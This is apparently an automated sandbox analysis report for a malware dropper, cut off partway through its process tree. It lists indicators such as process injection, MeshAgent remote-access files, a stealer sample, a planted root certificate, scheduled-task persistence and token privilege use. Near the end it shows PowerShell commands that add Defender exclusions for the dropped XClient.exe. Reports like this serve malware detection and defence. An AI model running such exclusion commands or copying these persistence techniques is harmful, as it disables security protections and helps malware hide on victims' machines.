description pid Process procid_target PID 2752 set thread context of 4380 2752 3544436.exe 84 PID 2220 set thread context of 1484 2220 76y5trfed675ytg.exe 101 PID 1484 set thread context of 2204 1484 iexplore.exe 106 PID 4088 set thread context of 5008 4088 j4vzzuai.exe 119 PID 2380 set thread context of 5404 2380 Cbmefxrmnv.exe 145 PID 3920 set thread context of 2644 3920 crypted.exe 187 PID 5820 set thread context of 1072 5820 hwbpwd.exe 206 PID 5928 set thread context of 4116 5928 needmoney.exe 231 -
resource yara_rule behavioral1/files/0x001900000002ab8e-15663.dat upx behavioral1/memory/18992-15695-0x0000000000400000-0x0000000000422000-memory.dmp upx behavioral1/files/0x001100000002b492-29480.dat upx behavioral1/files/0x000d00000002b96e-32597.dat upx -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.gif wow.exe File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.htm wow.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe meshagent32-group.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\sysppvrdnvs.exe tdrpload.exe File created C:\Windows\sysvplervcs.exe m.exe File opened for modification C:\Windows\sysvplervcs.exe m.exe File created C:\Windows\Tasks\Test Task17.job Cbmefxrmnv.exe File created C:\Windows\sysppvrdnvs.exe tdrpload.exe -
Launches sc.exe 25 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3116 sc.exe 3540 sc.exe 3792 sc.exe 6308 sc.exe 13260 sc.exe 11456 sc.exe 2352 sc.exe 6080 sc.exe 50872 Process not Found 2012 Process not Found 8976 Process not Found 26480 Process not Found 19888 Process not Found 51076 Process not Found 2508 sc.exe 5072 Process not Found 4488 sc.exe 50716 Process not Found 51180 Process not Found 48140 Process not Found 4672 sc.exe 3128 sc.exe 8184 sc.exe 4432 sc.exe 6108 sc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 3 IoCs
pid Process 5924 mshta.exe 37412 Process not Found 56968 Process not Found -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000d00000002b7db-31082.dat pyinstaller -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x000300000000068d-5470.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 12 IoCs
pid pid_target Process procid_target 3528 4088 WerFault.exe 115 3864 792 WerFault.exe 289 13332 8372 WerFault.exe 801 19600 17640 WerFault.exe 1024 14920 23980 Process not Found 1486 14440 11764 Process not Found 1729 16292 18320 Process not Found 1719 23744 18128 Process not Found 1941 29572 22276 Process not Found 949 32600 31412 Process not Found 2037 41256 40136 Process not Found 2227 50820 14780 Process not Found 1323 -
System Location Discovery: System Language Discovery 1 TTPs 60 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cbmefxrmnv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3544436.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Runtime Broker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc_default.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Installeraus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tdrpload.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTallowedtocrypt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 685410430.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language needmoney.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 247805573.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kmvcsaed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysvplervcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3132929399.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hwbpwd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language meshagent32-group.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wow.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hwbpwd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76y5trfed675ytg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language j4vzzuai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoodFrag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language j4vzzuai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wwbizsrvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cbmefxrmnv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 25 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5608 PING.EXE 12432 Process not Found 13592 Process not Found 29824 Process not Found 23032 PING.EXE 24288 Process not Found 27528 Process not Found 28496 Process not Found 34408 Process not Found 51104 Process not Found 53372 Process not Found 42648 Process not Found 16860 PING.EXE 27316 PING.EXE 19744 Process not Found 6580 Process not Found 24360 Process not Found 32772 Process not Found 34560 Process not Found 53792 Process not Found 15960 PING.EXE 23464 PING.EXE 6732 Process not Found 25408 Process not Found 46884 Process not Found -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
pid Process 1320 netsh.exe -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x000200000002a4c6-26504.dat nsis_installer_1 behavioral1/files/0x000200000002a4c6-26504.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 stealc_default.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString stealc_default.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost015.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost015.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 3024 timeout.exe 3152 timeout.exe 26188 Process not Found 11132 Process not Found 32336 Process not Found 36180 Process not Found -
Discovers systems in the same network 1 TTPs 64 IoCs
pid Process 56064 Process not Found 30248 Process not Found 44540 Process not Found 50536 Process not Found 36368 Process not Found 55500 Process not Found 55300 Process not Found 55536 Process not Found 55628 Process not Found 53672 Process not Found 44512 Process not Found 48920 Process not Found 49744 Process not Found 53328 Process not Found 45040 Process not Found 52608 Process not Found 49108 Process not Found 54852 Process not Found 48692 Process not Found 56460 Process not Found 58860 Process not Found 55524 Process not Found 44752 Process not Found 44296 Process not Found 51636 Process not Found 51980 Process not Found 52408 Process not Found 39888 Process not Found 43916 Process not Found 44948 Process not Found 44680 Process not Found 51212 Process not Found 58620 Process not Found 48904 Process not Found 56788 Process not Found 44380 Process not Found 55896 Process not Found 48060 Process not Found 46780 Process not Found 54496 Process not Found 58868 Process not Found 45052 Process not Found 48004 Process not Found 37816 Process not Found 48104 Process not Found 47720 Process not Found 53096 Process not Found 54452 Process not Found 44764 Process not Found 44492 Process not Found 48616 Process not Found 48216 Process not Found 53344 Process not Found 54192 Process not Found 50432 Process not Found 44432 Process not Found 59092 Process not Found 57604 Process not Found 29852 Process not Found 44496 Process not Found 28616 Process not Found 47084 Process not Found 44468 Process not Found 44552 Process not Found -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 29988 Process not Found -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 14344 Process not Found -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133765561231396946" MeshAgent.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ NOTallowedtocrypt.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2584844841-1405471295-1760131749-1000\{F2FB2D1C-300C-48D6-B1FD-EE5CCF247C74} svchost.exe -
Modifies registry key 1 TTPs 6 IoCs
pid Process 480 reg.exe 18404 Process not Found 22060 Process not Found 54820 Process not Found 2740 reg.exe 3836 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Runs ping.exe 1 TTPs 25 IoCs
pid Process 32772 Process not Found 42648 Process not Found 53792 Process not Found 5608 PING.EXE 12432 Process not Found 24288 Process not Found 27528 Process not Found 6580 Process not Found 25408 Process not Found 13592 Process not Found 24360 Process not Found 34408 Process not Found 34560 Process not Found 51104 Process not Found 15960 PING.EXE 27316 PING.EXE 19744 Process not Found 28496 Process not Found 46884 Process not Found 53372 Process not Found 16860 PING.EXE 23464 PING.EXE 23032 PING.EXE 6732 Process not Found 29824 Process not Found -
Scheduled Task/Job: Scheduled Task 1 TTPs 50 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 55144 Process not Found 57240 Process not Found 59268 Process not Found 58972 Process not Found 55512 Process not Found 1708 schtasks.exe 20768 schtasks.exe 40480 Process not Found 58792 Process not Found 56864 Process not Found 59336 Process not Found 54872 Process not Found 3348 Process not Found 56880 Process not Found 40084 Process not Found 56672 Process not Found 58248 Process not Found 10148 schtasks.exe 56716 Process not Found 57364 Process not Found 56844 Process not Found 56344 Process not Found 58444 Process not Found 54252 Process not Found 53664 Process not Found 1008 schtasks.exe 56332 Process not Found 56636 Process not Found 58240 Process not Found 7768 Process not Found 56964 Process not Found 57824 Process not Found 55444 Process not Found 56580 Process not Found 56792 Process not Found 57024 Process not Found 57104 Process not Found 55888 Process not Found 57556 Process not Found 59280 Process not Found 55888 Process not Found 56504 Process not Found 56552 Process not Found 57296 Process not Found 59248 Process not Found 58176 Process not Found 4464 Process not Found 20064 Process not Found 56420 Process not Found 57160 Process not Found -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 16055 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 4636 powershell.exe 4636 powershell.exe 4636 powershell.exe 3380 powershell.exe 3380 powershell.exe 2428 powershell.exe 2428 powershell.exe 3532 powershell.exe 3532 powershell.exe 2220 76y5trfed675ytg.exe 2220 76y5trfed675ytg.exe 456 stealc_default.exe 456 stealc_default.exe 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 2484 wwbizsrvs.exe 2484 wwbizsrvs.exe 5576 2232519369.exe 5576 2232519369.exe 6064 powershell.exe 6064 powershell.exe 6064 powershell.exe 5376 2014831613.exe 5376 2014831613.exe 2848 msedge.exe 2848 msedge.exe 5564 msedge.exe 5564 msedge.exe 892 powershell.exe 892 powershell.exe 892 powershell.exe 5376 2014831613.exe 5376 2014831613.exe 4116 svchost015.exe 4116 svchost015.exe 4896 identity_helper.exe 4896 identity_helper.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1484 iexplore.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2220 76y5trfed675ytg.exe 1484 iexplore.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2004 4363463463464363463463463.exe Token: SeDebugPrivilege 32 XClient.exe Token: SeDebugPrivilege 4380 MSBuild.exe Token: SeDebugPrivilege 4636 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 2428 powershell.exe Token: SeDebugPrivilege 3532 powershell.exe Token: SeDebugPrivilege 32 XClient.exe Token: 33 1624 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1624 AUDIODG.EXE Token: SeDebugPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: SeDebugPrivilege 1736 powershell.exe Token: SeDebugPrivilege 4820 Wave.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: SeBackupPrivilege 2484 wwbizsrvs.exe Token: SeRestorePrivilege 2484 wwbizsrvs.exe Token: SeDebugPrivilege 2380 Cbmefxrmnv.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: SeDebugPrivilege 2380 Cbmefxrmnv.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: SeDebugPrivilege 5576 2232519369.exe Token: SeDebugPrivilege 5800 Wave.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: SeDebugPrivilege 5820 hwbpwd.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: 33 1468 Runtime Broker.exe Token: SeIncBasePriorityPrivilege 1468 Runtime Broker.exe Token: SeDebugPrivilege 6064 powershell.exe Token: SeDebugPrivilege 5820 hwbpwd.exe Token: SeDebugPrivilege 892 powershell.exe Token: SeIncreaseQuotaPrivilege 892 powershell.exe Token: SeSecurityPrivilege 892 powershell.exe Token: SeTakeOwnershipPrivilege 892 powershell.exe Token: SeLoadDriverPrivilege 892 powershell.exe Token: SeSystemProfilePrivilege 892 powershell.exe Token: SeSystemtimePrivilege 892 powershell.exe Token: SeProfSingleProcessPrivilege 892 powershell.exe Token: SeIncBasePriorityPrivilege 892 powershell.exe Token: SeCreatePagefilePrivilege 892 powershell.exe Token: SeBackupPrivilege 892 powershell.exe Token: SeRestorePrivilege 892 powershell.exe Token: SeShutdownPrivilege 892 powershell.exe Token: SeDebugPrivilege 892 powershell.exe Token: SeSystemEnvironmentPrivilege 892 powershell.exe Token: SeRemoteShutdownPrivilege 892 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe 5564 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1484 iexplore.exe 1556 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2004 wrote to memory of 32 2004 4363463463464363463463463.exe 81 PID 2004 wrote to memory of 32 2004 4363463463464363463463463.exe 81 PID 2004 wrote to memory of 2752 2004 4363463463464363463463463.exe 82 PID 2004 wrote to memory of 2752 2004 4363463463464363463463463.exe 82 PID 2004 wrote to memory of 2752 2004 4363463463464363463463463.exe 82 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 2752 wrote to memory of 4380 2752 3544436.exe 84 PID 32 wrote to memory of 4636 32 XClient.exe 85 PID 32 wrote to memory of 4636 32 XClient.exe 85 PID 32 wrote to memory of 3380 32 XClient.exe 87 PID 32 wrote to memory of 3380 32 XClient.exe 87 PID 32 wrote to memory of 2428 32 XClient.exe 89 PID 32 wrote to memory of 2428 32 XClient.exe 89 PID 32 wrote to memory of 3532 32 XClient.exe 91 PID 32 wrote to memory of 3532 32 XClient.exe 91 PID 32 wrote to memory of 1008 32 XClient.exe 93 PID 32 wrote to memory of 1008 32 XClient.exe 93 PID 2004 wrote to memory of 2244 2004 4363463463464363463463463.exe 95 PID 2004 wrote to memory of 2244 2004 4363463463464363463463463.exe 95 PID 2004 wrote to memory of 2244 2004 4363463463464363463463463.exe 95 PID 2244 wrote to memory of 2708 2244 NOTallowedtocrypt.exe 96 PID 2244 wrote to memory of 2708 2244 NOTallowedtocrypt.exe 96 PID 2244 wrote to memory of 2708 2244 NOTallowedtocrypt.exe 96 PID 2708 wrote to memory of 2740 2708 cmd.exe 98 PID 2708 wrote to memory of 2740 2708 cmd.exe 98 PID 2708 wrote to memory of 2740 2708 cmd.exe 98 PID 2244 wrote to memory of 2220 2244 NOTallowedtocrypt.exe 99 PID 2244 wrote to memory of 2220 2244 NOTallowedtocrypt.exe 99 PID 2244 wrote to memory of 2220 2244 NOTallowedtocrypt.exe 99 PID 2220 wrote to memory of 2184 2220 76y5trfed675ytg.exe 100 PID 2220 wrote to memory of 2184 2220 76y5trfed675ytg.exe 100 PID 2220 wrote to memory of 2184 2220 76y5trfed675ytg.exe 100 PID 2220 wrote to memory of 1484 2220 76y5trfed675ytg.exe 101 PID 2220 wrote to memory of 1484 2220 76y5trfed675ytg.exe 101 PID 2220 wrote to memory of 1484 2220 76y5trfed675ytg.exe 101 PID 2220 wrote to memory of 1484 2220 76y5trfed675ytg.exe 101 PID 2184 wrote to memory of 3836 2184 cmd.exe 103 PID 2184 wrote to memory of 3836 2184 cmd.exe 103 PID 2184 wrote to memory of 3836 2184 cmd.exe 103 PID 1484 wrote to memory of 3400 1484 iexplore.exe 104 PID 1484 wrote to memory of 3400 1484 iexplore.exe 104 PID 1484 wrote to memory of 3400 1484 iexplore.exe 104 PID 1484 wrote to memory of 2204 1484 iexplore.exe 106 PID 1484 wrote to memory of 2204 1484 iexplore.exe 106 PID 1484 wrote to memory of 2204 1484 iexplore.exe 106 PID 1484 wrote to memory of 2204 1484 iexplore.exe 106 PID 3400 wrote to memory of 480 3400 cmd.exe 107 PID 3400 wrote to memory of 480 3400 cmd.exe 107 PID 3400 wrote to memory of 480 3400 cmd.exe 107 PID 2004 wrote to memory of 3152 2004 4363463463464363463463463.exe 109 PID 2004 wrote to memory of 3152 2004 4363463463464363463463463.exe 109 PID 2004 wrote to memory of 3152 2004 4363463463464363463463463.exe 109 PID 3152 wrote to memory of 1468 3152 GoodFrag.exe 110 PID 3152 wrote to memory of 1468 3152 GoodFrag.exe 110 PID 3152 wrote to memory of 1468 3152 GoodFrag.exe 110 PID 1468 wrote to memory of 1320 1468 Runtime Broker.exe 111 PID 1468 wrote to memory of 1320 1468 Runtime Broker.exe 111 PID 1468 wrote to memory of 1320 1468 Runtime Broker.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2652 attrib.exe 40700 Process not Found
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:32 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
